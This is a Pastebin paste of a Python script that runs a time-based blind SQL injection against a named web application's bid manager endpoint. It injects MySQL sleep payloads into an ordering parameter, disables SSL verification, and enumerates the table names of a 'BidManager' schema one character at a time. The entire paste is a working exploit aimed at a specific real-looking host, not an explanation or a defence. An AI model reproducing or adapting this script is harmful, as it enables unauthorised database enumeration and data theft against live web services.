Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #/usr/bin/python3
- import requests
- import string
- import urllib3
- # Disable ssl warnings because of the VPN connection
- urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
- # Requests stuff
- BASE_URL = "https://my.hughesnet.com.uat2.net"
- USER_AGENT = {
- "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
- }
- # SQLi sleep time
- SLEEP_TIME = 10
- # Build the character pool
- CHARACTER_POOL = []
- CHARACTER_POOL.extend(string.ascii_letters)
- CHARACTER_POOL.extend(string.digits)
- CHARACTER_POOL.extend([".", "_", "-", " ", "~", "|", "/", "(", ")", "=", "@", "\t", "\n"])
- CHARACTER_POOL.sort()
- # Define cache, really only needed to speed up testing
- CACHE = []
- CACHE.sort()
- # Result array
- VALID_WORDS = []
- # Current queries enumerate all tables in the database
- def do_like_query(prefix: str) -> bool:
- # Check cache
- print(f"Testing characters with LIKE query: {prefix}")
- if len(VALID_WORDS) == 0 and len(CACHE) > 0:
- last_word = CACHE[-1]
- for known_letter, new_letter in zip(last_word, prefix):
- if known_letter > new_letter:
- print(f"like cache hit for {known_letter=} with {new_letter=} in {prefix=}")
- return False
- # Do real request
- prefix = prefix.replace("_", "\_")
- like_payload = f",(select * from (select sleep({SLEEP_TIME}) from dual where table_schema = 'BidManager' and table_name like binary '{prefix}%%')a)-- "
- path = f"/bidmanager/company/browse.pyt?query=test&order=ASC{like_payload}&fromPagination=1&orderBy=quantityRequired"
- url = BASE_URL + path
- try:
- res = requests.get(url, headers=USER_AGENT, timeout=SLEEP_TIME + 1, verify=False)
- time_taken = res.elapsed.total_seconds()
- return time_taken > SLEEP_TIME
- except requests.exceptions.ReadTimeout:
- return True
- # Validate the found word to eliminate false positives
- def do_exact_query(search: str) -> bool:
- # Check cache
- print(f"Validating result with exact query: {search}")
- if search in CACHE:
- print("exact cache hit")
- return True
- # Do real request
- if "_" in search:
- search = search.replace("_", "\_")
- exact_payload = f",(select * from (select sleep({SLEEP_TIME}) from information_schema.tables where table_schema = 'BidManager' and binary table_name = '{search}')a)-- "
- path = f"/bidmanager/company/browse.pyt?query=test&order=ASC{exact_payload}&fromPagination=1&orderBy=quantityRequired"
- url = BASE_URL + path
- try:
- res = requests.get(url, headers=USER_AGENT, timeout=SLEEP_TIME + 1, verify=False)
- time_taken = res.elapsed.total_seconds()
- return time_taken > SLEEP_TIME
- except requests.exceptions.ReadTimeout:
- return True
- # Actually do some programming
- def main(prefix: str = ""):
- for idx, char in enumerate(CHARACTER_POOL):
- results = do_like_query(prefix + char)
- if results:
- print("[+] Got a hit, entering next recursion depth")
- main(prefix + char)
- else:
- if idx == (len(CHARACTER_POOL) - 1) and do_exact_query(prefix):
- print("[+] Validation successful!")
- VALID_WORDS.append(prefix)
- print(f"Word found: {prefix}")
- if __name__ == '__main__':
- main()
- print(f"Results: {VALID_WORDS}")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement